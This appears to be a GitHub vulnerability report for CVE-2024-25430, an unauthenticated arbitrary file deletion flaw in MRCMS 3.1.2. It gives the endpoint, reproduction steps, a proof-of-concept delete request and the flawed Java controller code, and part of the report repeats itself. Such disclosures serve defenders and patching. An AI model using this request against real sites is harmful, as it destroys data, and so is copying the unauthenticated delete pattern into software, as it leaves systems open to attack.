Open xia0chensec opened 7 months ago
[The name of an affected Product]
MRCMS
[The affected or fixed version]
v3.1.2
[CVE ID] CVE-2024-25430
[Vulnerability Type]
Arbitrary file deletion vulnerability
[Vulnerability Description]
MRCMS 3.1.2 exists an arbitrary file deletion vulnerability
[Vulnerability details]
The vulnerability exists: http://localhost:8080/admin/file/delete.do?path=/&name=
1.Select content->File management
2.Click the delete button
Try deleting the test.txt file
POC
GET /admin/file/delete.do?path=/&name=test.txt HTTP/1.1 Host: localhost:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Content-Length: 0
code discovery
Code path: MRCMS\src\main\java\org\marker\mushroom\controller\FileController.java
MRCMS\src\main\java\org\marker\mushroom\controller\FileController.java
@ResponseBody @RequestMapping("/delete") public Object delete(@RequestParam("path") String path, @RequestParam("name") String name){ if(fileManager.checkPath(path)){ return new ResultMessage(false, "路径检查异常,删除失败!"); } File file = new File(WebRealPathHolder.REAL_PATH + encoding(path + File.separator + name)); return fileManager.delete(file); }
Pass in the path and name variables in the code, specify the path through path, and specify the file/directory name through name
Code PathMRCMS\src\main\java\org\marker\mushroom\utils\FileTools.java
MRCMS\src\main\java\org\marker\mushroom\utils\FileTools.java
Users can delete arbitrary files without authorization because authentication is not used before file deletion.
public boolean deleteFolder(File delFolder) { // 判断目录或文件是否存在 if (!delFolder.exists()) { // 不存在返回 false return false; } else { // 判断是否为文件 if (delFolder.isFile()) { // 为文件时调用删除文件方法 return deleteFile(delFolder); } else { // 为目录时调用删除目录方法 return deleteDirectory(delFolder); } } }
[The name of an affected Product]
[The affected or fixed version]
[CVE ID] CVE-2024-25430
[Vulnerability Type]
[Vulnerability Description]
[Vulnerability details]
The vulnerability exists: http://localhost:8080/admin/file/delete.do?path=/&name=
1.Select content->File management
2.Click the delete button
Try deleting the test.txt file
POC
code discovery
Code path:
MRCMS\src\main\java\org\marker\mushroom\controller\FileController.java
Pass in the path and name variables in the code, specify the path through path, and specify the file/directory name through name
Code Path
MRCMS\src\main\java\org\marker\mushroom\utils\FileTools.java
Users can delete arbitrary files without authorization because authentication is not used before file deletion.